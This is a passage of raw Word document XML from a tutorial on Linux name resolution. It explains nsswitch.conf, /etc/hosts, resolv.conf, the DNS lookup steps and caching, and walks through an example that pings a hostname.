                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
              </w:rPr>
              <w:t>server1.example.com</w:t>
            </w:r>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> or open a website in a browser.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3AC3940C" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="264"/>
              </w:numPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Name Service Switch (NSS)</w:t>
            </w:r>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">: The system checks </w:t>
            </w:r>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C00000"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
              </w:rPr>
              <w:t>/etc/nsswitch.conf</w:t>
            </w:r>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">to decide the order of resolution methods (e.g., </w:t>
            </w:r>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
              </w:rPr>
              <w:t>hosts: files dns</w:t>
            </w:r>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C135BE2" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="264"/>
              </w:numPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Local resolution: </w:t>
            </w:r>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C00000"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
              </w:rPr>
              <w:t>/etc/hosts</w:t>
            </w:r>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>is checked first for static mappings.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DB8F0E7" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="264"/>
              </w:numPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>DNS resolution</w:t>
            </w:r>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">: If not found locally, the system reads </w:t>
            </w:r>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C00000"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
              </w:rPr>
              <w:t>/etc/resolv.conf</w:t>
            </w:r>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>to find DNS servers.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AFE94E1" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="264"/>
              </w:numPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Query to DNS server</w:t>
            </w:r>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">: The first nameserver in </w:t>
            </w:r>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
              </w:rPr>
              <w:t>/etc/resolv.conf</w:t>
            </w:r>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> is queried.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63A22FBD" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="264"/>
              </w:numPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Recursive resolution</w:t>
            </w:r>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>: The DNS server may contact other DNS servers to find the answer.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="600E41BF" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="264"/>
              </w:numPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Response</w:t>
            </w:r>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>: The IP address is returned to your system.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DFD1F4B" w14:textId="77777777" w:rsidR="00A60755" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="264"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Caching</w:t>
            </w:r>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">: The result may be cached locally (e.g., by </w:t>
            </w:r>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C00000"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
              </w:rPr>
              <w:t>systemd-resolved</w:t>
            </w:r>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C00000"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
              </w:rPr>
              <w:t>nscd</w:t>
            </w:r>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>, or the application) for faster future lookups.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8748" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12A65119" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3E5BE345" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00941B39" w:rsidRDefault="00A60755" w:rsidP="00A60755">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00941B39">
        <w:t>Key Files &amp; Components</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2784"/>
        <w:gridCol w:w="8820"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A60755" w:rsidRPr="00941B39" w14:paraId="2C8A269A" w14:textId="77777777" w:rsidTr="00C541B7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="662A95B2" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00421920" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421920">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Component / File</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0ABDC062" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00421920" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421920">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A60755" w:rsidRPr="00941B39" w14:paraId="14C64486" w14:textId="77777777" w:rsidTr="00C541B7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4AF7A1DC" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00941B39" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00421920">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C00000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
              </w:rPr>
              <w:t>/etc/nsswitch.conf</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19094C71" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00941B39" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00941B39">
              <w:t>Defines lookup order (files, DNS, LDAP, etc.)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A60755" w:rsidRPr="00941B39" w14:paraId="27F8F96F" w14:textId="77777777" w:rsidTr="00C541B7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="153F885F" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00421920" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C00000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421920">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C00000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
              </w:rPr>
              <w:t>/etc/hosts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="415F6720" w14:textId="77777777" w:rsidR="00A60755" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00941B39">
              <w:t>Static hostname-to-IP mappings</w:t>
            </w:r>
            <w:r>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0403FC76" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00941B39" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>A common convention is adding</w:t>
            </w:r>
            <w:r w:rsidRPr="00DE7892">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00DE7892">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>local hostname</w:t>
            </w:r>
            <w:r w:rsidRPr="00DE7892">
              <w:t xml:space="preserve"> (like a machine on your LAN)</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> to this file.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A60755" w:rsidRPr="00941B39" w14:paraId="7670CF26" w14:textId="77777777" w:rsidTr="00C541B7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1585E481" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00941B39" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00421920">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C00000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
              </w:rPr>
              <w:t>/etc/resolv.conf</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C9BDFC9" w14:textId="77777777" w:rsidR="00A60755" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00941B39">
              <w:t>Lists DNS servers (nameserver) and search domains</w:t>
            </w:r>
            <w:r w:rsidRPr="00B86A44">
              <w:t>, in priority order.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12E50155" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00941B39" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B86A44">
              <w:t>You can list up to</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> 3 </w:t>
            </w:r>
            <w:r w:rsidRPr="00941B39">
              <w:t>nameserver</w:t>
            </w:r>
            <w:r>
              <w:t>. This is the rule!</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A60755" w:rsidRPr="00941B39" w14:paraId="1BFE9AFD" w14:textId="77777777" w:rsidTr="00C541B7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60C7EAA0" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00941B39" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00941B39">
              <w:t>Local resolver library</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7080E5D9" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00941B39" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00941B39">
              <w:t>Implements the lookup logic in the OS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A60755" w:rsidRPr="00941B39" w14:paraId="0BB88C5D" w14:textId="77777777" w:rsidTr="00C541B7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="118C97C8" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00941B39" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00941B39">
              <w:t xml:space="preserve">DNS Server (e.g., </w:t>
            </w:r>
            <w:r w:rsidRPr="00421920">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
              </w:rPr>
              <w:t>8.8.8.8</w:t>
            </w:r>
            <w:r w:rsidRPr="00941B39">
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="59A78C27" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00941B39" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00941B39">
              <w:t>Resolves queries recursively or iteratively</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="41ED773E" w14:textId="77777777" w:rsidR="00A60755" w:rsidRDefault="00A60755" w:rsidP="00A60755">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E046CD9" w14:textId="77777777" w:rsidR="00A60755" w:rsidRDefault="00A60755" w:rsidP="00A60755">
      <w:r w:rsidRPr="00B86A44">
        <w:t>When you type something like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD0AD2E" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="006B5005" w:rsidRDefault="00A60755" w:rsidP="00A60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6B5005">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ping server1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52908A36" w14:textId="77777777" w:rsidR="00A60755" w:rsidRDefault="00A60755" w:rsidP="00A60755">
      <w:r w:rsidRPr="00B86A44">
        <w:t>Your system needs to figure out what IP address corresponds to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006B5005">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        </w:rPr>
        <w:t>server1</w:t>
      </w:r>
      <w:r w:rsidRPr="00B86A44">
        <w:t xml:space="preserve">. But </w:t>
      </w:r>
      <w:r w:rsidRPr="006B5005">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        </w:rPr>
        <w:t>server1</w:t>
      </w:r>
      <w:r w:rsidRPr="00B86A44">
        <w:t xml:space="preserve"> is just a name — not an address. So your system asks:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B86A44">
        <w:t xml:space="preserve">“Hey, where can I find the IP for </w:t>
      </w:r>
      <w:r w:rsidRPr="006B5005">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        </w:rPr>
        <w:t>server1</w:t>
      </w:r>
      <w:r w:rsidRPr="00B86A44">
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1324EB" w14:textId="77777777" w:rsidR="00A60755" w:rsidRDefault="00A60755" w:rsidP="00A60755">
      <w:r>
        <w:t xml:space="preserve">First your system checks </w:t>
      </w:r>
      <w:r w:rsidRPr="00D71F32">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        </w:rPr>
        <w:t>/etc/nsswitch.conf</w:t>
      </w:r>
      <w:r w:rsidRPr="00B86A44">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>to know the</w:t>
      </w:r>
      <w:r w:rsidRPr="00D71F32">
        <w:t xml:space="preserve"> lookup order</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7C030C" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="006B5005" w:rsidRDefault="00A60755" w:rsidP="00A60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6B5005">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>hosts: files dns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238D9544" w14:textId="77777777" w:rsidR="00A60755" w:rsidRDefault="00A60755" w:rsidP="00A60755">
      <w:r>
        <w:t xml:space="preserve">It realizes that it needs to check </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE7892">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        </w:rPr>
        <w:t>/etc/hosts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> local file first:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A40422" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="006B5005" w:rsidRDefault="00A60755" w:rsidP="00A60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6B5005">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">127.0.0.1   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
